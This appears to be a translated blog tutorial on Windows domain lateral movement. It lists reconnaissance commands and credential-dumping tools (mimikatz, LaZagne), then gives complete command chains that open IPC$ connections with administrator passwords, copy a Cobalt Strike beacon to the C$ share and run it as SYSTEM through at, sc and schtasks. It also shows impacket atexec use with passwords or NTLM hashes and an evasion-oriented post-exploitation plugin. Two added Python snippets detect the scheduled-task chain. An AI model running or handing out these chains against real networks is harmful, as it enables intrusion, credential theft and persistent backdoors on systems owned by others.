[Intranet Security - Lateral Movement] IPC$ Connection ---> Scheduled Tasks ---> Go Online

Table of contents

1. Information collection (target & user & password)
   1. Brief introduction
      1. Gather information as a dictionary
      2. Collection method
2. Lateral movement
   1. ipc$
   2. at command
   3. sc command
   4. schtasks (scheduled tasks)
3. Use example
   1. Process
   2. Example
4. Tools
   1. CS plugin: LSTAR - Aggressor
   2. impacket-atexec

1. Information collection (target & user & password)

1. Brief introduction

1. Gather information as a dictionary

1) Target dictionary: list of hosts and networks in the domain

2) User dictionary: list of users and groups in the domain

3) Password dictionary: domain passwords

2. Collection method

command + tool

Applications & services & privileges
systeminfo         detailed system information
netstat -ano       port list
route print        routing table
net start          started services
tasklist           process list
schtasks           scheduled tasks
ipconfig /all      determine whether a domain exists
net view /domain   determine whether a domain exists
net time /domain   identify the primary domain
netstat -ano       currently open network ports
nslookup 域名       trace the source address (域名 = domain name placeholder)
wmic service list brief          query local services
net config workstation           query the current logon domain and logged-on user
wmic startup get command,caption view autostart programs

Network & users & domain controllers
net view /domain   list domains
net time /domain   query the time from the domain controller; if the current user is a domain user the DC returns the current time; also identifies the primary domain, which usually acts as the time server
net localgroup administrators 本机管理员 -> local administrators (usually includes domain users)
net user /domain   list domain users (current domain)
net group /domain  list domain groups
net group "domain computers" /domain   list all computers joined to the domain
net group "domain admins" /domain      list the Domain Admins group and its members
net localgroup administrators /domain  view domain administrators
net group "domain controllers" /domain view domain controllers
net accounts /domain view the domain password policy
 
 
Passwords & credentials
1. User hashes and plaintext passwords: mimikatz (Windows), mimipenguin (Linux)
https://github.com/gentilkiwi/mimikatz/
https://github.com/huntergregal/mimipenguin
2. Passwords of various protocols and services: LaZagne (all platforms), XenArmor (Windows), CS plugins
https://github.com/AlessandroZ/LaZagne/
https://xenarmor.com/allinone-password-recovery-pro-software/
3. Site source-code backups, database backup files, etc.
4. Web management portals of databases, such as phpMyAdmin
5. Passwords and cookies saved in browsers
6. Other users' sessions, 3389 and ipc$ connection records, recycle bin contents
7. Wi-Fi passwords saved by Windows
8. Accounts and passwords used inside the network, such as email, VPN, FTP and OA systems



2. Lateral movement

1. ipc$

1. IPC$ (Internet Process Connection) is a "named pipe" share resource.


2. Function: the named pipe opened for inter-process communication grants the corresponding permissions once a user name and password have been verified. It is used for remote management of a computer and for viewing its shared resources (the directory structure, user list and other information on the target host).


3. Conditions of use:

Port 139 or 445 open: either port on its own is enough for file sharing.

An IPC$ connection uses port 445 (SMB) by default and falls back to port 139 (NetBIOS) if that fails (some systems force 445).


4. Null session:

An ipc$ connection made without an account or password (no privileges).

Logging in as a user or administrator gives the corresponding privileges.


5. Default shares:

Default shares (all logical drives and the system directory) are enabled out of the box so that administrators can manage the machine remotely; they are accessed over an ipc$ connection.


6. Permission issues:

Method 1: a domain admin user has the privilege to establish an IPC connection and reach the admin$ share.

Method 2: the local Administrator account (disabled by default) can be used to connect remotely.


7. ipc$ connection failure error numbers

Error 5      Access denied ---> the user probably lacks administrator privileges ---> escalate privileges
Error 51     Windows cannot find the network path ---> network problem
Error 53     The network path was not found ---> wrong IP address; target is powered off; target's lanmanserver service is not running; target has a firewall (port filtering)
Error 67     The network name cannot be found ---> lanmanworkstation service not started; the target has removed the ipc$ share
Error 1219   The supplied credentials conflict with an existing set of credentials ---> an ipc$ connection to the target already exists ---> delete it and reconnect
Error 1326   Unknown user name or bad password
Error 1385   Logon failure: the user has not been granted the requested logon type at this computer ---> the user may be denied by the "Deny access to this computer from the network" policy; or the user given in the ipc$ connection does not exist
Error 1792   An attempt was made to log on, but the network logon service was not started ---> the target's NetLogon service is not running (seen when connecting to a domain controller)
Error 2242   The password of this user has expired ---> the target has an account policy that forces periodic password changes

Common causes:
(1) The target system is not NT or later
(2) The target has not enabled the IPC$ share
(3) Ports 139 and 445 are not open on the target
(4) Firewall ports are not open
(5) The command, account or password is wrong

8. Common commands of IPC$ :

net use \\192.168.*.*\ipc$ "" /u:""                         # establish a null session
net use \\192.168.*.*\ipc$ "密码" /user:"Administrator"     # establish an authenticated connection (密码 = password placeholder)
net use                               # list this machine's share connections
dir \\xx.xx.xx.xx\C$\                 # list files
net view \\192.168.*.*                # list the shares of a host you already have a connection to
net time \\192.168.*.*                # show the target host's time
nbtstat -A 192.168.*.*                # show the target's NetBIOS name table (NetBIOS must also be enabled locally)
net use \\192.168.*.*\ipc$ /del /y    # delete the connection to the given IP
net use * /del /y                     # delete all of this machine's connections
copy 1.exe \\192.168.*.*\c$\windows\temp\1.exe    # file upload
copy vps.exe \\192.168.*.*\c$         # copy the given file from the current directory to the target
xcopy d:\sqlitedata\*.* \\192.168.*.*\c$\temp /E /Y /D         # upload local files to the target's c:\temp directory
copy \\192.168.*.*\c$\plugin_update.exe c:\                    # download a file from the target to the local C: drive
net share c$ /del                     # remove the default share
net share c$=c:                       # restore the default share
net use z: \\192.168.*.*\c$ "密码" /user:"administrator"   # map the target's C: drive as local Z: (other drives likewise)
net use z: \\192.168.*.*\c$   # access the mapped drive
net use z: /del               # remove the mapped drive
net use * /del                # delete all connections; prompts for y to confirm

2. at command

1. Brief description: scheduled tasks (requires the at package installed and the atd service running)


2. Common commands

at \\192.168.*.* 17:00:00 C:\vps.exe     # create a scheduled task with at
at \\192.168.*.* 作业ID /delete          # delete the at job (作业ID = job ID placeholder)
at \\192.168.*.* 17:00:00 cmd.exe /c "ipconfig > C:/1.txt "    # run a command via at, write its output to a file on the target, then read that file with type
type \\192.168.*.*\C$\1.txt              # view the generated 1.txt
at \\192.168.*.* 11:23 cmd /c "c:\windows\temp\test.bat"      # schedule a task that runs a batch script through cmd

3. sc command:

1. Brief introduction: SC is a powerful command-line tool present since Windows XP. It communicates with the Service Control Manager and with installed services.


2. Function:

1) Retrieve and set control information about the service

2) Change the startup state of the service : Set the service properties stored in the registry to control how the service application is started at startup and how it runs as a background program

3) Delete useless services in the system

4) Configure the specified service , retrieve the status of the current service, and also stop and start the service (functionally similar to the NET STOP/START command, but SC is faster and can stop more services)

5) Create a batch file to call different SC commands to automatically start or shut down the service sequence


3. Format:

The SC command cannot be used alone , it must be used in combination with other commands

The 24 subcommands:
sc boot
sc config
sc continue
sc control
sc create
sc delete
sc description
sc enumdepend
sc failure
sc getdisplayname
sc getkeyname
sc interrogate
sc lock
sc pause
sc qc
sc qdescription
sc qfailure
sc query
sc queryex
sc querylock
sc sdset
sc sdshow
sc start
sc stop

SC command format : SC [Servername] command Servicename [Optionname= Optionvalues]

1. Servername: the name of the remote server the service is on, in UNC format ("\\myserver"). Omit this parameter to run SC.exe locally.

2. command: one of the 24 subcommands above (the word after SC, such as query, start, stop, create, config).

3. Servicename: the name of the service to configure; to start a service, type sc start followed by its service name. (Note that this is the service name, not the display name. The service name is visible in the Services console under Administrative Tools: double-click DHCP Client and its service name is Dhcp, while DHCP Client is the display name. sc can also change a service's display name.)

4. Optionname= Optionvalues: option names and their values.

4. Example:

To load the Themes service automatically at system start, use

sc config themes start= auto

Here start is the option and auto is its value. (Note the space after the = sign: every option must be written with a space after the = sign, followed by the option value.)


5. Use:

# copy to the target host
copy test.exe \\192.168.*.*\c$

# create the service (the original comment called this a scheduled task; sc create registers a service)
sc \\192.168.*.* create shell binpath= "c:\test.exe" start= auto displayname= "shellstart"
sc \\192.168.*.* create test binpath= "c:\windows\temp\test.bat" start= auto displayname= "shellstart"

# start, stop, delete
sc \\192.168.*.* start test
sc \\192.168.*.* stop test
sc \\192.168.*.* delete test

4. schtasks (scheduled tasks)

1. Brief description: Schedule commands and programs to run regularly or at a specific time , add and delete tasks in the plan, start and stop tasks on demand, and display and change scheduled tasks (you can also use the schtasks.exe tool)


2. Advantages and disadvantages: Windows Vista, Windows Server 2008 and later have dropped the at command in favour of schtasks. schtasks is more flexible than at. Using schtasks leaves a log file on the system: C:\Windows\Tasks\SchedLgU.txt


3. Permissions:

1) To schedule, view and change all tasks on the local computer, you must be a member of the Administrators group.

2) To schedule, view and change all tasks on a remote computer, you must be a member of the Administrators group on the remote computer, or supply the remote administrator's credentials with the /u parameter.

3) If the local and remote computers are in the same domain, or the local computer is in a domain trusted by the remote computer's domain, you can use the /u parameter with /create or /change. Otherwise the remote computer cannot authenticate the given account and cannot verify that it is a member of the Administrators group.

4) Scheduled tasks must have the permissions they need, which vary by task. By default a task runs with the permissions of the current user on the local computer, or of the user given with /u. To run a task with the privileges of a different account or with system privileges, use the /ru parameter.


4. Grammar:

schtasks /change    # change one or more task properties: the program the task runs (/tr), the account it runs under (/ru), that account's password (/rp), the interactive-only flag (/it)
schtasks /create    # schedule a new task
schtasks /delete    # delete a scheduled task
schtasks /end       # stop the program started by a task
schtasks /query     # list the tasks scheduled on the computer
schtasks /run       # start a scheduled task immediately; ignores the schedule but uses the program path, account and password saved in the task

(Related commands come from Microsoft official documents)

schtasks /create creates a scheduled task: parameters

# when /sc is MINUTE, HOURLY, DAILY, WEEKLY etc., /mo must give the run interval
/sc onlogon      start at user logon
/sc onstart      start at system startup
/sc onidle       start when the system is idle

Parameters:
/sc   schedule type: MINUTE, HOURLY, DAILY, WEEKLY, ONCE, ONSTART, ONLOGON, ONIDLE, MONTHLY, ONEVENT
/tn   task name, used later to query, change, delete or run the task
/tr   program or command to run; a space in the value splits it into program and arguments, so escape the double quotes when passing a full command line
/ru   account the task runs under; if omitted, the task runs as the account that ran schtasks
/rp   password of that account
/mo   run interval within the schedule type
/d    day of the month or week on which to run; only for MONTHLY and WEEKLY
/m    month in which to run; only for MONTHLY
/i    for ONIDLE, the number of minutes the computer must be idle before the task runs
/st   start time for MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY; defaults to the local computer's current time
/ri   repetition interval in minutes; not valid for MINUTE, HOURLY, ONSTART, ONLOGON, ONIDLE
/et   end time for MINUTE and HOURLY schedules; after it schtasks does not start the task again unless the system clock is set back to the start time; no end time by default
/du   duration of the schedule, similar to /et; no duration by default
/k    stop the task when the end time or duration is reached; without it the task keeps running or is restarted when the time is up
/it   run only when the user is logged on
/z    delete the task once its schedule has completed
/f    suppress the warning if the task already exists
/RL   run level of the job: LIMITED or HIGHEST; default LIMITED
/F    force creation and suppress the warning if the task already exists

5. Common commands :

schtasks /create /s 192.168.*.* /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f    # create a task named test on the target that starts C:\vps.exe as SYSTEM once every hour


schtasks /query | findstr test                    # query the test task
schtasks /run /s 192.168.*.* /i /tn "test"        # run the test task
schtasks /delete /s 192.168.*.* /tn "test" /f     # delete the test task

Note: check the target host's time first (it may differ from yours, heh)

# create the task (密码 = password placeholder)
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 12:00 /S 192.168.*.* /RU System /u administrator /p "密码"

# run the task immediately
schtasks /run /tn "plugin_update" /S 192.168.*.* /u administrator /p "密码"

# delete the task
schtasks /F /delete /tn "plugin_update" /S 192.168.*.* /u administrator /p "密码"

# use a scheduled task to re-enable the default share remotely
schtasks /create /tn "plugin_update" /tr "cmd /c net share c$=c:" /sc once /st 12:00 /S 192.168.*.* /RU System /u administrator /p "密码"
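As an added detection-side example (not from the original post), here is a small Python parser for the task XML that Windows writes into Security event 4698 whenever one of the schtasks /create commands above is registered on the target; it maps the XML back onto /tr, /ru, /RL and /sc and flags the combinations this page relies on (SYSTEM run level, a program under a temp directory, cmd as the task action). The sample XML, the staging-directory list and the interpreter list are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample of the TaskContent XML that Security event 4698 records when a task such as
# "schtasks /create /tn plugin_update /tr c:\windows\temp\plugin_update.exe /sc once /st 12:00 /RU System"
# is registered on the host. Backslashes are doubled for Python.
SAMPLE_4698_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>GOD\\administrator</Author></RegistrationInfo>
  <Triggers><TimeTrigger><StartBoundary>2023-02-04T12:00:00</StartBoundary></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel>
  </Principal></Principals>
  <Actions Context="Author"><Exec><Command>c:\\windows\\temp\\plugin_update.exe</Command></Exec></Actions>
</Task>"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
# Assumed watch lists; tune them to your estate.
STAGING_DIRS = ("\\windows\\temp\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
INTERPRETERS = ("cmd", "cmd.exe", "powershell", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe")

def parse_task(xml_text):
    """Map the task XML back onto the schtasks switches listed above (/tr, /ru, /RL, /sc)."""
    root = ET.fromstring(xml_text)
    def text(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""
    trig = root.find("t:Triggers/*", NS)
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "user": text("t:Principals/t:Principal/t:UserId"),        # /ru
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),  # /RL
        "command": text("t:Actions/t:Exec/t:Command"),            # /tr program
        "arguments": text("t:Actions/t:Exec/t:Arguments"),        # /tr arguments
        # /sc: TimeTrigger (once/daily/...), BootTrigger (onstart), LogonTrigger (onlogon), IdleTrigger (onidle)
        "trigger": trig.tag.split("}")[-1] if trig is not None else "",
    }

def assess_task(task):
    """Return the reasons a newly registered task deserves review; an empty list means nothing stood out."""
    reasons = []
    cmd = task["command"].lower()
    exe = cmd.rsplit("\\", 1)[-1]
    if task["user"].upper() in SYSTEM_IDS or task["run_level"] == "HighestAvailable":
        reasons.append("runs as SYSTEM / highest run level")
    if any(d in cmd for d in STAGING_DIRS):
        reasons.append("program sits in a staging directory: " + task["command"])
    if exe in INTERPRETERS:
        reasons.append("action is a command interpreter: " + (task["arguments"] or "(no arguments)"))
    return reasons
```

The same parser applies to the task XML exported with schtasks /query /xml, so it can also be run over tasks that already exist on a host.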



3. Use example

1. Process:

1) Lateral movement: ipc connection---->create scheduled task (at|schtasks)---->execute scheduled task--->impacket-atexec tries to connect


2) Go online: copy the backdoor/use the command to download the backdoor---->execute the backdoor file/related commands

2. Example:

1) at command

net use \\192.168.3.21\ipc$ "密码" /user:god.org\administrator     # establish the ipc connection (domain\user; 密码 = password placeholder)
copy beacon.exe \\192.168.*.*\c$       # upload the payload: copy the executable to the target host
net time \\192.168.*.*                 # check the target's time
at \\192.168.*.* 12:00 c:\beacon.exe   # add the scheduled task

2) schtasks command

net use \\192.168.*.*\ipc$ "密码" /user:god.org\administrator # establish the ipc connection (domain\user; 密码 = password placeholder)
copy beacon.exe \\192.168.*.*\c$           # copy the file to the target's C: drive
net time \\192.168.*.*                     # check the target's time
schtasks /create /s 192.168.*.* /u administrator /p 密码 /sc DAILY /tn beacon /tr "c:\beacon.exe" /ST 12:00 /f                   # create the beacon task that runs the copied file (double quotes; cmd does not treat single quotes as quoting)
schtasks /run /s 192.168.*.* /tn beacon /i        # run the beacon task
schtasks /delete /s 192.168.*.* /tn beacon /f     # delete the beacon task
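The chain in 1) and 2) leaves a recognisable trail in the target's Security log: a type-3 network logon (4624), share access to IPC$ and then C$ or ADMIN$ (5140) and a task registration (4698), all carrying the same logon ID. This added Python correlation rule (not part of the original post; the event records and the ten-minute window are constructed assumptions) flags that sequence and leaves alone a network logon that only touched IPC$.

```python
from datetime import datetime, timedelta

# Constructed Security-log records from the target host, reduced to the fields the rule needs. They mirror
# the chain above: net use \\target\ipc$ -> copy beacon.exe \\target\c$ -> schtasks /create (event 4698).
# Logon ID 0x41B22 is a benign network logon that only touched IPC$ and must not alert.
SAMPLE_EVENTS = [
    {"time": "2023-02-04 11:58:02", "id": 4624, "logon_id": "0x3E7A1", "logon_type": 3, "user": "administrator", "src_ip": "192.168.3.31"},
    {"time": "2023-02-04 11:58:02", "id": 5140, "logon_id": "0x3E7A1", "share": "\\\\*\\IPC$"},
    {"time": "2023-02-04 11:58:40", "id": 5140, "logon_id": "0x3E7A1", "share": "\\\\*\\C$"},
    {"time": "2023-02-04 11:59:10", "id": 4698, "logon_id": "0x3E7A1", "task": "\\beacon"},
    {"time": "2023-02-04 11:59:12", "id": 4624, "logon_id": "0x41B22", "logon_type": 3, "user": "backupsvc", "src_ip": "192.168.3.5"},
    {"time": "2023-02-04 11:59:13", "id": 5140, "logon_id": "0x41B22", "share": "\\\\*\\IPC$"},
]

ADMIN_SHARES = {"C$", "ADMIN$"}
WINDOW = timedelta(minutes=10)  # assumed: the whole chain lands within ten minutes of the network logon

def correlate(events):
    """Return one alert per network logon (4624 type 3) that used IPC$ plus an admin share and then
    registered a scheduled task (4698) inside WINDOW. Events are keyed on the logon ID the host assigns."""
    sessions, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        lid = ev["logon_id"]
        if ev["id"] == 4624:
            if ev["logon_type"] == 3:   # only a network logon can start the chain
                sessions[lid] = {"start": ts, "user": ev["user"], "src_ip": ev["src_ip"], "shares": set(), "ipc": False}
            continue
        s = sessions.get(lid)
        if s is None or ts - s["start"] > WINDOW:
            continue   # not a tracked network logon, or too long after it
        if ev["id"] == 5140:
            name = ev["share"].rsplit("\\", 1)[-1].upper()
            if name == "IPC$":
                s["ipc"] = True
            elif name in ADMIN_SHARES:
                s["shares"].add(name)
        elif ev["id"] == 4698 and s["ipc"] and s["shares"]:
            alerts.append({"logon_id": lid, "user": s["user"], "src_ip": s["src_ip"],
                           "shares": sorted(s["shares"]), "task": ev["task"],
                           "seconds_after_logon": int((ts - s["start"]).total_seconds())})
    return alerts
```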



4. Tools

1. cs plugin---LSTAR - Aggressor

1) Brief description:

1. One plugin that takes you from the first beacon to the domain controller, roaming the internal network

2. Built to simplify the CS right-click menu and to be easy to integrate, drawing on many post-exploitation plugins

3. Rebuilds and extends host credential harvesting, multi-level pivoting, hidden scheduled tasks, AV-evading Mimikatz, cloned and added users, and other features

4. Features:

Works with CobaltStrike's TCP, SMB and Proxy beacons for hosts without internet access, to traverse complex network environments
Provides several evasion-oriented execution methods for RDP-related, AddUser, LsassDump and similar functions, for unusual environments
Integrates several evasion features that run through WinAPI or in-memory assembly loading, such as shadow users and hidden scheduled tasks

2) Project address:

lintstar/LSTAR: LSTAR - CobaltStrike Synthesis Post Exploitation Plugin (github.com) https://github.com/lintstar/LSTAR

(The project brief is from the project address)

2. impacket-atexec

1) Brief description:

Impacket is a collection of Python classes for working with network protocols. Impacket focuses on providing low-level programmatic access to packets and, for some protocols such as SMB1-3 and MSRPC, provides the protocol implementation itself. Packets can be built from scratch or parsed from raw data, and the object-oriented API makes it easy to deal with the deep hierarchies of protocols. The library provides a set of tools as examples of what can be done in the context of the library.

(from project address)


2) Function:

This tool is semi-interactive and suited to use from a webshell or through a SOCKS proxy; during an engagement the user names, plaintext passwords, password hashes and remote hosts collected so far can be gathered into dictionaries for batch testing.


3) Project address (Python version)

fortra/impacket: Impacket is a collection of Python classes for working with network protocols. (github.com) https://github.com/fortra/impacket


4) Example:

python atexec.py god/administrator:密码@192.168.*.* "ver"           # domain user with plaintext password (密码 = password placeholder)
python atexec.py -hashes :…… ./administrator@192.168.*.* "whoami"   # local user with NTLM hash


5) Exe version:

RichChigga/impacket-examples-windows (gitee.com) https://gitee.com/RichChigga/impacket-examples-windows

CS, local user, plaintext password:
shell atexec.exe ./administrator:密码@192.168.*.* "whoami"

CS, domain user, plaintext password:
shell atexec.exe god/administrator:密码@192.168.*.* "ver"

CS, local or domain user, NTLM hash:
shell atexec.exe -hashes :…… ./administrator@192.168.*.* "whoami"
shell atexec.exe -hashes :…… god/administrator@192.168.*.* "whoami"

Origin blog.csdn.net/qq_53079406/article/details/128899133